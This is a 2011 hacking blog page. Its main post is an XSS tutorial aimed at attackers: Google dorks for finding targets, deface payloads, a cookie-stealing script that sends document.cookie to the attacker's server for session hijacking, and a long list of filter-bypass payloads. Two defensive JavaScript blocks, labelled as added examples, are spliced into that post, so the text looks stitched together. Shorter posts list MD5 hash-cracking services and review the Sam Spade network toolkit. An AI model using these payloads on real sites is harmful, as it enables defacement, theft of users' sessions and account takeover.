Saturday, December 3, 2011

CROSS SITE SCRIPTING (XSS) HACKING



What is XSS?
'XSS', also known as 'CSS' (Cross Site Scripting), is a very common vulnerability found in web applications. XSS allows an attacker to INSERT malicious code into the affected application, either to bypass access to the website or to phish its users. There are many types of XSS attacks; I will cover the three most used.


Types of XSS 
There are actually three types of Cross-Site Scripting, commonly named as:
1. DOM-Based XSS
2. Non-persistent XSS
3. Persistent XSS

DOM-Based
DOM-Based Cross-Site Scripting allows an attacker to work not on a victim website but on the victim's local machine: operating systems usually ship with some HTML pages created for different purposes, and since humans make mistakes, these HTML pages can often be exploited due to code vulnerabilities.
DOM-Based XSS exploits these problems on the user's local machine in this way:
  • The attacker creates a well-built malicious website.
  • The ingenuous user opens that site.
  • The user has a vulnerable page on his machine.
  • The attacker's website sends commands to the vulnerable HTML page.
  • The vulnerable local page executes those commands with the user's privileges on that machine.
  • The attacker easily gains control of the victim's computer.

Non-Persistent
Non-persistent XSS vulnerabilities are actually the most common ones found on the Net. They are called "non-persistent" because they work on an immediate HTTP response from the victim website: the flaw shows up when the web page takes the data provided by the attacker's client and uses it to automatically generate a result page for the attacker himself. Building on this, the attacker can supply some malicious code and try to make the server execute it in order to obtain some result.

The most common application of this kind of vulnerability is in a website's search engine: the attacker writes some arbitrary HTML code in the search text box and, if the website is vulnerable, the result page will render those HTML entities.

Persistent
Persistent XSS vulnerabilities are similar to the second type (non-persistent XSS), because both work on a victim site and try to steal users' information. The difference is that on a website vulnerable to persistent XSS the attacker doesn't need to deliver a crafted URL to the users, because the website itself lets users insert fixed data into the system: a "guestbook", for example. Users normally use that kind of tool to leave messages for the owner of the website, and at first glance it doesn't seem dangerous, but if an attacker discovers that the system is vulnerable, he can insert some malicious code in his message and make ALL visitors victims of it.

This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided by the user into the result page.

How to Find XSS Vulnerabilities?

Well, to start finding these vulnerabilities you can check blogs, forums, shout boxes, comment boxes, search boxes; there are too many to mention.

'Google Dorks' make the finding easier. If you want to get cracking, go to google.com and type inurl:"search.php?q=": that is a common page and has a lot of results. Also note that most sites have XSS vulnerabilities; it's just a matter of having a good eye and some good knowledge of how to bypass their filtering.

Basics of XSS
Well, now let's start learning some actual methods. The most commonly used XSS injection is:

<script>alert("The Hacker News")</script>

This will pop up an alert box saying The Hacker News (without quotes). So, using "search.php?q=", you can simply try the following on a website that has the same page:

http://website.com/search.php?q=<script>alert("The Hacker News")</script>

There is a good chance of it working, but don't be worried if it doesn't; just try different sites. You can insert HTML, not just JavaScript:

http://website.com/search.php?q=<br><br><b><u>The Hacker News</u></b>

If you see the bold text on the page and the newlines, then you know it's vulnerable.


How to Deface a Website using XSS?
Well, now that you understand how XSS works, we can explain some simple XSS deface methods. There are many ways of defacing; I will mention some of the best and most used, the first one being IMG SRC. For those of you who don't know HTML, IMG SRC is a tag that displays the image linked to it on the web page.

<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>

OK, now if you change the link to a valid picture link, save it and run it, you will see what I mean. Now say you have found a shout box, comment box, or anything that shows your data after you submit it; you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

The other tags are not needed, as the page will already have them. It helps to make your picture big so it stands out and it's clear the site got hacked. Another method is using Flash videos; it's the same as the IMG method but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf">

That will execute the Flash video linked to it. Or maybe use a popup or redirection, as in:
<script>window.open( "http://www.thehackernews.com/" )</script>

There are many other ways that you can find using Google or other websites. My purpose is to make you understand the concept :)

How to Steal Cookies using XSS?
I decided to add this as it's the most useful method of XSS. Now you have it; save it as a .php file and upload it to your server, and remember to create the file 'log.txt' too and chmod it to 777. Now find an XSS-vulnerable website (any attack type will do) and insert this code:

window.location =
"http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location =
"http://yourServer.com/cookielogger.php?c="+document.cookie

Now when a user visits the page that got injected, they will be sent to your site and their cookie will be stolen; the second one is more stealthy. Watch your file for cookies, then you can hijack their session :D


But now you ask: what if my site hasn't got this kind of attack, it only shows data once and doesn't store it? Well, let's say we had a page search.php?q=; we can use the following code to make a malicious URL from it, and maybe hex or base64 encode it so people can't see the code:

http://site.com/search.php?q=document.location =
"http://yourServer.com/cookielogger.php?c="+document.cookie

How to Bypass Filtering?
A lot of sites may seem vulnerable but don't execute the code; to solve this, read on. Some common methods to bypass filtering are:

')alert('xss');

or

");alert('xss');
That will do the same thing as <script>alert("XSS")</script> on a vulnerable server. You can also try hex or base64 encoding your data before you submit it. Please note it's bad practice to use alert("XSS") to test for XSS, because some sites block the keyword "XSS", so we use "The Hacker News".

Some other ways to bypass filtering:
website.com/search.php?q="><script>alert('The Hacker News')</script>
website.com/search.php?q="><script>alert("The Hacker News")</script>
website.com/search.php?q="><script>alert("The Hacker News");</script>
website.com/search.php?q="><script>alert(/The Hacker News");</script>
website.com/search.php?q=//"><script>alert(/The Hacker News/);</script>
website.com/search.php?q=abc<script>alert(/The Hacker News/);</script>
website.com/search.php?q=abc"><script>alert(/The Hacker News/);</script>
website.com/search.php?q=abc"></script><script>alert(/The Hacker News/);</script>
website.com/search.php?q=abc//abc"></script>alert(/The Hacker News/);</script>
website.com/search.php?q=000"><script></script><script>alert(The HackerNews);</script>
website.com/search.php?q=000abc</script><script>alert(/The Hacker News/);</script>
website.com/search.php?q=--<script>"></script>alert(/The Hacker News/);</script>
website.com/search.php?q=pwned<script>document.write('The Hacker News');</script>
website.com/search.php?q=pwned</script><script>document.write(The Hacker News);</script>
website.com/search.php?q=pwned')alert(The Hacker News);//
website.com/search.php?q=pwned";)alert(The Hacker News);//
website.com/search.php?q=pwned");alert(/The Hacker News/);//
website.com/search.php?q=pwned//"></script><script>location.href='javascript:alert(/The Hacker News/);</script>
website.com/search.php?q="><img src='javascript:alert('The Hacker News');'>
website.com/search.php?q="><script src='http://malicous js'</script>
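From the defender's side, the probe list above is also a detection signature. The following is an added example, not code from the original post: a small scanner that flags reflected-XSS probes of exactly this shape (encoded or double-encoded `search.php?q=` payloads) in web-server access logs. The pattern list, the log lines and the function names are my own construction.

```javascript
// Added example, not code from the original post: a log scanner that flags
// the kind of reflected-XSS probes listed above (search.php?q=<script>...)
// in web-server access logs. Patterns and log lines are constructed here.

// Indicators drawn from the probe list above: script tags, javascript: URLs,
// a few inline event handlers, document.* tricks, fromCharCode and alert().
const XSS_PATTERNS = [
  /<\s*script/i,                              // 0: opening <script
  /<\s*\/\s*script/i,                         // 1: closing </script
  /javascript\s*:/i,                          // 2: javascript: URL
  /<\s*(img|embed|iframe|svg)\b/i,            // 3: tag able to load/run content
  /\bon(error|load|click|mouseover)\s*=/i,    // 4: inline event handler
  /document\.(cookie|location|write)/i,       // 5: cookie theft / redirect / write
  /String\.fromCharCode/i,                    // 6: quote-free string building
  /\balert\s*\(/i,                            // 7: classic proof payload
];

// URL-decode up to three times, stopping when the text stops changing:
// probes are often encoded once or twice to get past naive filters.
function fullyDecode(s) {
  let prev = null, cur = s;
  for (let i = 0; i < 3 && cur !== prev; i++) {
    prev = cur;
    try { cur = decodeURIComponent(cur.replace(/\+/g, " ")); } catch (e) { break; }
  }
  return cur;
}

// Parse one line in Apache/nginx "combined" format. Returns {ip, path, query} or null.
function parseLogLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+"/);
  if (!m) return null;
  const u = new URL(m[2], "http://localhost"); // base only so a relative path parses
  return { ip: m[1], path: u.pathname, query: fullyDecode(u.search.slice(1)) };
}

// Indexes into XSS_PATTERNS that matched the decoded query string.
function findXssIndicators(line) {
  const req = parseLogLine(line);
  if (!req) return [];
  return XSS_PATTERNS.map((re, i) => (re.test(req.query) ? i : -1)).filter(i => i >= 0);
}

// Scan a whole log and return only the suspicious requests.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const matched = findXssIndicators(line);
    if (matched.length) hits.push({ ...parseLogLine(line), matched });
  }
  return hits;
}

// Constructed sample log: one normal search, then three probes (plain,
// double-encoded with fromCharCode, and an attribute-breakout img tag).
const SAMPLE_LOG = [
  '203.0.113.5 - - [03/Dec/2011:10:00:01 +0000] "GET /search.php?q=shoes HTTP/1.1" 200 512',
  '203.0.113.5 - - [03/Dec/2011:10:00:02 +0000] "GET /search.php?q=%3Cscript%3Ealert(%22The%20Hacker%20News%22)%3C/script%3E HTTP/1.1" 200 640',
  '198.51.100.7 - - [03/Dec/2011:10:00:03 +0000] "GET /search.php?q=%253Cscript%253Ealert(String.fromCharCode(116,112,122))%253C/script%253E HTTP/1.1" 200 640',
  '198.51.100.7 - - [03/Dec/2011:10:00:04 +0000] "GET /search.php?q=%22%3E%3Cimg%20src%3D%27javascript:alert(1)%27%3E HTTP/1.1" 200 640',
];

for (const h of scanLog(SAMPLE_LOG)) {
  console.log(h.ip, h.path, "patterns:", h.matched.join(","));
}
```

A 200 response to such a request does not by itself prove the reflection was unescaped; correlate with the page's output encoding, or test the sink with a harmless probe, before treating it as a confirmed vulnerability.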

Advanced XSS - a way to bypass magic quotes filtering
OK, now we are going to learn some good techniques. I have come across many sites where 'Magic Quotes' is on, rendering some commands useless. Fear not, I have come up with a way using char codes (decimals) and converting the char codes to ASCII. The function that turns char codes (decimals) into ASCII is shown below; you can find a complete table HERE.

This will help you write what you want. In my examples I will be writing "tpz", which has the following char codes:
116 112 122

OK, now that we have the decimal values of our string, we need to know which JavaScript function converts them.

String.fromCharCode()

is suitable for this kind of thing; it's easy to set up, and I'm going to give it my argument below.

String.fromCharCode(116, 112, 122)

OK, now "String.fromCharCode(116, 112, 122)" is the JavaScript (ASCII) way of saying "tpz". To use this with alerts etc. you don't need to use quotes, as it acts as a variable.

<script>alert(String.fromCharCode(116, 112, 122))</script>

OK, now this will display our message, in this case "tpz". This method is very useful for bypassing magic quotes and maybe some custom escaping of quotes. There are many other methods that I'm not going to talk about right now.
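The flip side of the magic-quotes trick is what a site should do instead. The following is an added example, not code from the original post: a JavaScript model of the search.php?q= result page (the same fix applies to the guestbook case in the persistent XSS section) showing that backslash-escaping quotes, as magic quotes does, leaves the `<script>`, `String.fromCharCode` and `"><img` payloads above fully intact, while HTML-entity encoding of the reflected data neutralises all of them. `addslashes`, `escapeHtml`, `renderSearchPage` and `hasInjectedMarkup` are my own names; the payloads are the ones quoted on this page.

```javascript
// Added example, not code from the original post: models the search.php?q=
// page in JavaScript to show why magic quotes (PHP addslashes) does nothing
// against the payloads above and what output encoding does instead.

// What PHP magic quotes / addslashes() does: backslash-escape ' " \ and NUL.
function addslashes(s) {
  return s.replace(/[\\'"]/g, c => "\\" + c).replace(/\0/g, "\\0");
}

// The actual fix for HTML text and double-quoted attribute contexts:
// turn the five HTML metacharacters into entities.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// A result page that reflects q into a text node and an input value,
// the two places the post's payloads target.
function renderSearchPage(q, encoder) {
  const v = encoder(q);
  return `<p>Results for: ${v}</p>\n<input type="text" name="q" value="${v}">`;
}

// The template itself contains exactly 3 '<' and 6 '"'. Any extra means the
// input created a new tag or broke out of the attribute: markup injection.
function hasInjectedMarkup(html) {
  const count = ch => html.split(ch).length - 1;
  return count("<") > 3 || count('"') > 6;
}

// Payloads quoted from the post: plain, quote-free via fromCharCode,
// and an attribute breakout.
const PAYLOADS = [
  '<script>alert("The Hacker News")</script>',
  '<script>alert(String.fromCharCode(116, 112, 122))</script>',
  `"><img src='javascript:alert('The Hacker News');'>`,
];

// For each payload, report whether each encoder lets markup through.
function compareEncoders(payloads = PAYLOADS) {
  return payloads.map(p => ({
    payload: p,
    magicQuotes: hasInjectedMarkup(renderSearchPage(p, addslashes)),
    htmlEscape: hasInjectedMarkup(renderSearchPage(p, escapeHtml)),
  }));
}

for (const r of compareEncoders()) {
  console.log(JSON.stringify(r));
}
```

Marking the session cookie HttpOnly additionally keeps document.cookie, as used in the cookie-stealing payloads above, from exposing it to injected script.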

Friday, November 25, 2011

DECRYPT MD5 HASHES


MD5 hashing is said to be a one-way hash method, where it is not possible to decrypt the hashed string to get the original word. But once the string that was hashed with MD5 is indexed in Google, and its hash is indexed too, it is possible to recover the original password through it. However, a normal Google search won't really make it easy for you to find the original strings. So I am going to tell you about some special search engines, most of them derived from Google, which help in decrypting your MD5 hashes and revealing the originally locked passwords or keywords.


Online decrypting
  • This will help you generate as well as decrypt MD5-hashed strings. It has a Google-like interface.
  • This also helps in decoding the hex-coded strings, which are 32 characters long.
  • Helps to decode as well as encode an MD5 hash.
  • Has a Google-like look and is powered by rednoize.com. Using SHA1 is also possible with this tool.
  • This helps to decrypt a maximum of 8 hashes at the same time. A CAPTCHA is used to avoid use by spammers.
  • Decrypts a hash to clear text as well as encrypts any string into an MD5 hash.
  • This searches about five databases for the hash; if the clear text is found in any of those, the appropriate result is shown.
  • A Chinese search engine to decrypt MD5 hashes online.


Local software

You would like to try cracking the hash on your local machine? Of course there are applications that will handle this as well, such as the top dogs "John the Ripper" and "Cain & Abel":

  • Rainbow table implementation that supports multiple hash types like LM, NTLM and MD5.
  • In my opinion the most advanced password cracker for Windows available to the public.
  • Local software (Windows) using GPU hardware.
  • Using John the Ripper (Unix/Windows) to crack MD5 hashes locally.

Sunday, November 20, 2011

SAM SPADE: A MULTIFUNCTION INFORMATION TOOLKIT


Systems and security administrators have a number of useful tools at their disposal to obtain information about computers attached to other networks on the Internet, as well as information about the Internet itself. Ping, traceroute, whois and nslookup are among the essential utilities for even rudimentary maintenance and testing. But the native Windows environment includes only a few of these tools and they are, by and large, individual command line utilities and one has to go to third parties to obtain many of the missing utilities. Sam Spade is a nice piece of software that combines many of these common tools and several more uncommon ones into a single, integrated, Windows-compatible package.

Jack of All Trades

Sam Spade runs on all versions of Windows starting with Windows 95 and makes it simple to do a lot of investigation and analysis quickly, from determining the owner of a particular IP address block to examining the contents of a Web page. It also has several features that are specific to the detection of spam and sites that relay spam. Like a real private detective, Sam Spade doesn't do anything that you couldn't do yourself if you knew how and had the right tools; this software integrates the capabilities found in ping, traceroute, time, whois, nslookup, finger, DIG, a packet sniffer, a port scanner, a scripting language, and more, all with a nice GUI to boot.
FIGURE 1. The Sam Spade command console.

Figure 1 shows the Sam Spade command console. The various tools can be accessed via the pulldown menus, and several from the icons on the left side of the window.
FIGURE 2. Sam Spade configuration dialog box.

Although most of Sam Spade's features will run immediately upon installation, the more interesting and useful features require some minimal configuration. The configuration dialog box (Figure 2) is accessible from the Edit, Options pulldown menu. Key features to configure are your default name server, e-mail address, and Web site on the Basics tab; the network news server on the News tab; and e-mail information for abuse e-mails on the Mail tab. Users can also configure a time server (Miscellaneous tab), log file locations (Logfiles tab), and scripting file locations (Scripting tab). Advanced users can also specify whether DNS zone transfers, port scanning, and/or e-mail relay checking is allowed (Advanced tab).

Although most of Sam Spade's features will run immediately upon installation, some functions require configuration, including your default name server, e-mail address, Web site, network news server, time server, and log file locations. Users can also specify whether DNS zone transfers, port scanning, and/or e-mail relay checking are allowed; these may be useful features for a knowledgeable user but can be mistaken as an attack by a remote system, so their use should be limited.

All of the functions become available when the user enters a host name, domain name, or e-mail address in the address window, seen at the upper left of the main console screen. One of the advantages of this bundle of tools in one package is that once you enter a name or address, you can merely click on different tools to quickly obtain information.

Tools for Address, Domain, and Host Information

The bulk of Sam Spade's utilities allow the user to look up information about a remote host or domain, generally for the purpose of initial reconnaissance or forensic analysis:

  • Ping sends a series of packets to the indicated host to determine if that system is reachable via the network and provides an estimate of the round trip packet time.
  • Traceroute traces the route that packets take from the user's system to the specified target host address, listing all intermediate routers and showing a graph of the hop-by-hop delay times. Fast and slow traceroute differ only in the number of attempts made to learn the route.
  • Nslookup and Decode URL display the IP address and name of a specified host. This can help an investigator learn about the owner of a system from the domain name or obtain an IP address with which to further investigate the geographic location of a system.
  • Whois provides ownership and contact information for the specified host's domain. This tool is increasingly convenient as the number of domain name registrars grows. When Network Solutions was the sole registrar for .com, for example, their whois database was the only one you needed to search. With about 100 accredited registrars today, you have to do a search just to find out which registrar to look up. Sam Spade's whois function does this for you.
  • IP Block indicates the owner of the IP address block to which the specified host belongs. By identifying the owner of an address block, you can start to narrow down where a host is geographically located and/or learn about the host's upstream Internet service provider (ISP).
  • DIG (Domain Internet Groper), like nslookup, looks up DNS information. Sam Spade's DIG function returns all DNS records associated with a specified host or domain, including the start of authority (SOA), mail exchange (MX) and name server (NS) records. This information allows the user to determine where to send e-mail to a host's domain and how to access the manager of the domain's name space.
  • Zone Transfer is used to request that a DNS server send all of the information that it has about a given domain. Properly configured DNS servers will not comply with this request as a security precaution, but it will work surprisingly often. This is a great way to test your own name servers.
  • Finger obtains host/user information from a system running the finger daemon (TCP port 79). Finger is generally (or should be) disabled at a host because it can give an attacker a lot of information about users and/or the host itself, but it isn't always turned off.

Tools for E-mail and Spam

Several of the Sam Spade utilities are targeted at e-mail, allowing an end user or security administrator to determine the validity of e-mail header information as well as to fight back against spam. The program also provides an extensive tutorial on tracking and combating spam. These tools include:

  • SMTP Verify can be used to send a Simple Mail Transfer Protocol (SMTP) VRFY command to a suspect mail server to confirm the validity of an e-mail address, such as that of the sender of a spam message (ever notice that most of the return addresses are bogus?). This function is generally (or should be) disabled at an SMTP server because it can give an attacker a lot of information about e-mail users. However, it isn't always turned off and it is worth checking out.
  • Blacklist checks to see if the specified host name/address is listed with the Mail Abuse Prevention System (MAPS) Realtime Blackhole List (RBL), Dial-up Users List (DUL) or Relay Spam Stopper (RSS). More information about this function can be found at the MAPS Web site at www.mail-abuse.org.
  • SMTP Relay Check determines if a specified e-mail server will allow SMTP relaying. Most e-mail servers are configured to prohibit relaying, but spammers look for SMTP servers that relay to help them cover their tracks. Many sites block all incoming e-mail originating from an e-mail server known to relay e-mail because of the spam potential.
FIGURE 3. E-mail header parsing and verification.

  • Parse e-mail headers allows the user to verify a set of headers from an e-mail message. As shown in Figure 3, the mail headers can be copied directly from an e-mail message and pasted into the parse e-mail headers dialog box; Sam Spade will then indicate whether the mail headers appear to be valid or not. Spammers or others looking to cover their e-mail tracks will often put in false e-mail header information.
  • Abuse Lookup finds the e-mail address to where notifications of possible spam coming from the specified domain should be sent. Most ISPs maintain an address of the form abuse@<ISP.net>.
  • Check Cancels searches for USENET canceled messages. The original intent of cancel was to allow someone who sent a USENET message to cancel the message if they wanted to, and it is now used largely to automatically cancel spam.

Tools to Examine a Server or Web Site

Several Sam Spade tools allow a user to more closely examine the services available from another host, with particular attention to obtaining information about Web servers:

  • Scan Addresses is a minimal port-scanning utility that allows a user to scan a specified set of IP addresses to detect open ports (which indicates what Internet services are available).
FIGURE 4. Web page display from Sam Spade.

  • Browse Web is actually a bare-bones Web browser. Rather than displaying the rendered Hypertext Markup Language (HTML) page, however, this function displays the raw Hypertext Transfer Protocol (HTTP) code (Figure 4), providing such details about the Web server as the operating system, Web server software, and HTTP extensions. It is also very useful for debugging CGI scripts or when looking at potentially malicious Web sites.
  • Crawl Web site allows you to specify a URL and download all accessible pages from a Web site.